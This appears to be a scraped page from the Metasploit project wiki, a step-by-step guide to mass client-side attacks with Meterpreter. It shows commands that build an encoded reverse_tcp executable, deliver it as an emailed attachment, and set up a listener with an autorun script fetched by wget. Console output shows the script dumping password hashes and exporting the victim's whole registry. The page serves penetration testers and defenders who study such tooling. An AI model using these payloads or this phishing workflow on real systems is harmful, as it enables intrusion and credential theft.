Beruflich Dokumente
Kultur Dokumente
Search:
Metasploit Framework
Overview Activity Roadmap Issues Wiki Repository
FeatureGuide »
Wiki
Metasploit 3 Automating Meterpreter for ClientSide Exploits Start page
Index by title
Step 1. Determine your payload delivery. In this case, we will be manually sending an email message to each target, with an executable Index by date
attached. The actual "exploit"
is social engineering, but this can be replaced by any other type of remote code execution vector. To generate an executable for the test, we use
msfpayload piped to msfencode.
$ msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | \
msfencode b '' t exe o meterpreter.exe
$ file meterpreter.exe
meterpreter.exe: MSDOS executable PE for MS Windows (GUI) Intel 80386 32bit
$ ls alrt meterpreter.exe
rwrr 1 hdm hdm 9728 Nov 17 13:24 meterpreter.exe
Step 2. Configure a shellcode handler inside Metasploit 3. Since we are targeting a wide
variety of users, we want them to connect back to us. In order to get the most amount
of information possible, we will be using the Meterpreter payload.
msf > use exploit/multi/handler
msf exploit(handler) > set [[ExitOnSession]] false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST A.B.C.D
msf exploit(handler) > set LPORT 8080
Step 3. In order to make efficient use of each session, we are going to provide
Meterpreter with an "autorun" script. This script will scrape system information
from each session automatically when the session is created. One example of this
kind of script can be found at:
http://metasploit.com/users/hdm/tools/scraper.rb
msf exploit(handler) > sh c 'cd /tmp; wget http://metasploit.com/users/hdm/tools/scraper.rb'
msf exploit(handler) > set [[AutoRunScript]] /tmp/scraper.rb
msf exploit(handler) > exploit j
Step 4. Send out our email or otherwise force the Meterpreter payload to execute
on each target. At this point, results should start streaming in. Once the autorun script
completes, the session will be available from the msfconsole. The captured data will be
stored in the ~/.msf3/logs/scraper/ directory.
[*] Transmitting intermediate stager for oversized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] New session on 10.10.11.164:12188...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\DOCUME~1\HD\LOCALS~1\Temp\NIgfrwlC.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\DOCUME~1\HD\LOCALS~1\Temp\dClzheFr.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\DOCUME~1\HD\LOCALS~1\Temp\mhJZFMly.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\DOCUME~1\HD\LOCALS~1\Temp\CphWxqAm.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\DOCUME~1\HD\LOCALS~1\Temp\aHrkdFru.reg)
[*] Cleaning HKU
[*] Completed processing on 10.10.11.164:12188...
[*] Meterpreter session 1 opened (10.10.10.26:8080 > 10.10.11.164:12188)
msf exploit(handler) > sessions i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: HDMWIN\HD
Updated by } at }.
meterpreter > getuid
Server username: HDMWIN\HD
Updated by } at }.
Popular entries
1. WikiStart(51116)
2. Install Windows(34882)
3. Install Linux(31177)
4. Install Ubuntu(27197)
5. UserGuide(24394)
6. Updating(23530)
7. Installation(21544)
8. Karmetasploit(21168)
9. NeXpose Plugin(16771)
10. Release Notes 33 (13773)
11. Install BackTrack(12813)
12. Release Notes 333 (10780)
13. FeatureGuide(10390)
14. Exploit Ranking(10387)
15. Install MacOSX(7882)
16. AutomatingMeterpreter(7215)
17. Release Notes 34 (7099)
18. Install iPhone(5388)
19. WMAP(4907)
20. AdvisoryToExploit(4644)
21. Release Notes 332 (4492)
22. Install Android(4485)
23. PortingExploits(4229)
24. OracleUsage(4206)
25. Pivoting(4066)
26. DeveloperGuide(4008)
27. Release Notes 331 (3466)
28. DisableCourtesyShell(2916)
29. Release Notes 32 (2831)
30. ContributingToTheFramework(2566)
Powered by Redmine © 20062010 JeanPhilippe Lang
Rapid7 Privacy Statement